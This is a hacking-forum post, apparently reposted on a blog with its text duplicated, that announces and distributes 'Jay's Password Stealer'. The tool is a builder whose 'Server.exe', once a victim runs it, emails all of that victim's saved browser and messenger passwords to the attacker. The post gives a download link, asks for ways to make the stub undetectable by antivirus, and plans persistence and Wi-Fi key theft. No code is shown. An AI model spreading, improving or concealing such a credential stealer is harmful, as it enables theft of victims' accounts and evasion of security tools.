Hello Ubers,
So I haven't made a release in a long time as far as I can remember. I only made a crypter which I released in the UB+ section, however that failed miserably
.
So I'm going to release a password stealer made by me. It's a very simple password stealer TBH and not very advance since my programming skills aren't very advance, YET!
This program uses software's from Nirsoft. Now, now. I know this is not a good idea. But I just wanted to give it a try. I wasn't going to release this at all. However I found this quit cool so I thought I might as well release it for my fans and for those who will love this just for the fun of it.
Important Notice:
This is a one time use only. For example. The "Server.exe" that you send to you victim. When they open it. It will send every single password from the victim to your email address. After that once the victim shuts down the PC, the program will end. This application does not include startup mode or interval for sending logs. Therefore once the victim opens your "Server.exe". That's all to it.
Images/Pics of The Application:
![[Image: ra992Wh.png]](http://i.imgur.com/ra992Wh.png)
Green = Unchecked Red = Checked
![[Image: iHU6hng.png]](http://i.imgur.com/iHU6hng.png)
How Logs Are Sent:
![[Image: ZTqhfmZ.png]](http://i.imgur.com/ZTqhfmZ.png)
Jay's Password Stealer Application Includes:
--> Chrome Password Stealer.................................
--> Internet Explorer Password Stealer.....................
--> Instant Messengers Password Stealer.................
--> Oper Password Stealer......................................
--> All-in-One Password Stealer (Incase others fail)...
Virus Scan:
Builder:
![[Image: image.php?ID=44b092661cb33a82cf57bfcf32d192df]](http://elementscanner.com//image.php?ID=44b092661cb33a82cf57bfcf32d192df)
Stub:
I know the stub is detected. Obviously because it uses Nirsoft password stealer softwares. Now if anyone has a method to make them FUD that would be great if you can tell me. As far I know know crypters with EOF may work or might make the server.exe corrupt. I heard you cannot make it FUD because the files are dropped at runtime. Even it its in the Temporary folder, which I done on my coding. Its still Detected.
![[Image: image.php?ID=492cbf7ae00e9ddffa6c9f5c1e5f0a89]](http://elementscanner.com//image.php?ID=492cbf7ae00e9ddffa6c9f5c1e5f0a89)
@Albus:
Download:
http://adf.ly/Rs2iM
Future updates that might happen:
If this program gets a hit and is successful I will try to include these following updates.
--> Include to Startup.
--> Regular Interval logs. Maybe daily logs.
--> Network Password Stealer.
--> Wireless Key Password Stealer.
--> More Password Stealers.
Credits are included in the application. As you can see in the images above.
I hope you liked it.
1 Second To Like Thread.
2 Seconds To Rate Thread.
10 Seconds to Comment.
45 Mins To Create Thread.
2 Hours To Code This (Mainly because I got stuck
)
So I haven't made a release in a long time as far as I can remember. I only made a crypter which I released in the UB+ section, however that failed miserably
. So I'm going to release a password stealer made by me. It's a very simple password stealer TBH and not very advance since my programming skills aren't very advance, YET!
This program uses software's from Nirsoft. Now, now. I know this is not a good idea. But I just wanted to give it a try. I wasn't going to release this at all. However I found this quit cool so I thought I might as well release it for my fans and for those who will love this just for the fun of it.
Important Notice:
This is a one time use only. For example. The "Server.exe" that you send to you victim. When they open it. It will send every single password from the victim to your email address. After that once the victim shuts down the PC, the program will end. This application does not include startup mode or interval for sending logs. Therefore once the victim opens your "Server.exe". That's all to it.
Images/Pics of The Application:
![[Image: ra992Wh.png]](http://i.imgur.com/ra992Wh.png)
Green = Unchecked Red = Checked
![[Image: iHU6hng.png]](http://i.imgur.com/iHU6hng.png)
How Logs Are Sent:
![[Image: ZTqhfmZ.png]](http://i.imgur.com/ZTqhfmZ.png)
Jay's Password Stealer Application Includes:
--> Chrome Password Stealer.................................
--> Internet Explorer Password Stealer.....................
--> Instant Messengers Password Stealer.................
--> Oper Password Stealer......................................
--> All-in-One Password Stealer (Incase others fail)...
Virus Scan:
Builder:
Stub:
I know the stub is detected. Obviously because it uses Nirsoft password stealer softwares. Now if anyone has a method to make them FUD that would be great if you can tell me. As far I know know crypters with EOF may work or might make the server.exe corrupt. I heard you cannot make it FUD because the files are dropped at runtime. Even it its in the Temporary folder, which I done on my coding. Its still Detected.
@Albus:
Spoiler (Click to View)
Download:
http://adf.ly/Rs2iM
Future updates that might happen:
If this program gets a hit and is successful I will try to include these following updates.
--> Include to Startup.
--> Regular Interval logs. Maybe daily logs.
--> Network Password Stealer.
--> Wireless Key Password Stealer.
--> More Password Stealers.
Credits are included in the application. As you can see in the images above.
I hope you liked it.
1 Second To Like Thread.
2 Seconds To Rate Thread.
10 Seconds to Comment.
45 Mins To Create Thread.
2 Hours To Code This (Mainly because I got stuck
)Credits : Jaydeeph
No comments:
Post a Comment
Note: only a member of this blog may post a comment.